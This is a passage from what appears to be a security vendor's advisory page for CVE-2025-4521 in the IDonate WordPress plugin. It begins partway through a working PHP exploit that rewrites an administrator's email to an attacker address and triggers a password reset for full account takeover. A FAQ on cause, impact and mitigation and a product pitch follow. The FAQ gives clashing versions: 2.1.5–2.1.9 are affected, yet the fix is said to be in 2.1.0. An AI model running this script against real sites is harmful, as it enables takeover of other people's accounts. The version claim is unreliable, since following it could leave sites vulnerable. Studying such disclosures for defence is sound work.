curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$exploit_response = curl_exec($ch);

// Check if exploit succeeded
if (strpos($exploit_response, 'success') !== false || strpos($exploit_response, 'updated') !== false) {
    echo "[+] Successfully updated administrator email to attacker-controlled email.n";
    echo "[+] Now trigger password reset for email: " . $attacker_email . "n";
    
    // Step 3: Trigger password reset for the compromised email
    $reset_url = $target_url . "/wp-login.php?action=lostpassword";
    curl_setopt($ch, CURLOPT_URL, $reset_url);
    curl_setopt($ch, CURLOPT_POST, false);
    $reset_page = curl_exec($ch);
    
    // Extract nonce from reset page
    preg_match('/name="wpnonce" value="([^"]+)"/', $reset_page, $nonce_match);
    $wpnonce = isset($nonce_match[1]) ? $nonce_match[1] : '';
    
    // Submit password reset request
    $reset_data = array(
        'user_login' => $attacker_email,
        'wpnonce' => $wpnonce,
        'redirect_to' => '',
        'wp-submit' => 'Get New Password'
    );
    
    curl_setopt($ch, CURLOPT_URL, $reset_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($reset_data));
    $reset_response = curl_exec($ch);
    
    if (strpos($reset_response, 'Check your email') !== false || strpos($reset_response, 'password reset') !== false) {
        echo "[+] Password reset initiated. Check email at " . $attacker_email . " to complete account takeover.n";
    } else {
        echo "[-] Password reset may have failed. Manual reset required.n";
    }
} else {
    echo "[-] Exploit failed. Response: " . $exploit_response . "n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-4521?
Overview of the vulnerability
CVE-2025-4521 is a high-severity vulnerability in the IDonate plugin for WordPress, affecting versions 2.1.5 to 2.1.9. It allows authenticated users with Subscriber-level access or higher to perform account takeover and privilege escalation due to a missing authorization check in the idonate_donor_profile() function.
How does the vulnerability work?
Mechanics of exploitation
The vulnerability allows an authenticated attacker to send a POST request to the WordPress AJAX endpoint, targeting another user’s donor profile. By modifying the email address of the targeted account and triggering a password reset, the attacker can gain full administrative access to the site.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the IDonate plugin versions 2.1.5 to 2.1.9 is at risk. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability to take over other accounts.
How can I check if my site is vulnerable?
Assessment steps
To check for vulnerability, verify the version of the IDonate plugin installed on your WordPress site. If it is between versions 2.1.5 and 2.1.9, your site is vulnerable and should be updated immediately.
How can I fix or mitigate this issue?
Recommended actions
The vulnerability is fixed in version 2.1.0 of the IDonate plugin. Update your plugin to this version or later to ensure that the missing capability check is implemented, preventing unauthorized access.
What does a CVSS score of 8.8 mean?
Understanding risk levels
A CVSS score of 8.8 indicates a high level of risk, suggesting that the vulnerability can lead to significant impacts on confidentiality, integrity, and availability. Sites affected by this vulnerability could face severe consequences if exploited.
What is the root cause of this vulnerability?
Technical explanation
The root cause lies in the idonate_donor_profile() function, which lacks a capability check to ensure that the current user has permission to modify the specified donor record. This oversight allows unauthorized users to update donor profiles.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker with Subscriber-level access can authenticate to a vulnerable site, modify an administrator’s email address, and trigger a password reset to gain control of the account.
What are the potential impacts if this vulnerability is exploited?
Consequences of exploitation
If exploited, an attacker could take over any user account, including administrators, allowing them to manipulate site content, install malicious plugins, and manage users. This can lead to a complete compromise of the WordPress site.
What additional security measures should I consider?
Enhancing overall security
In addition to updating the IDonate plugin, consider implementing strong password policies, enabling two-factor authentication for users, and regularly auditing user permissions to enhance overall site security.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for development
To prevent similar vulnerabilities, developers should implement thorough capability checks for all user actions, conduct regular code reviews, and utilize security testing tools to identify potential flaws before deployment.
Where can I find more information about this vulnerability?
Resources for further reading
For more information, you can refer to the official CVE database, security advisories from WordPress, and the documentation provided by the IDonate plugin developers regarding the vulnerability and its remediation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations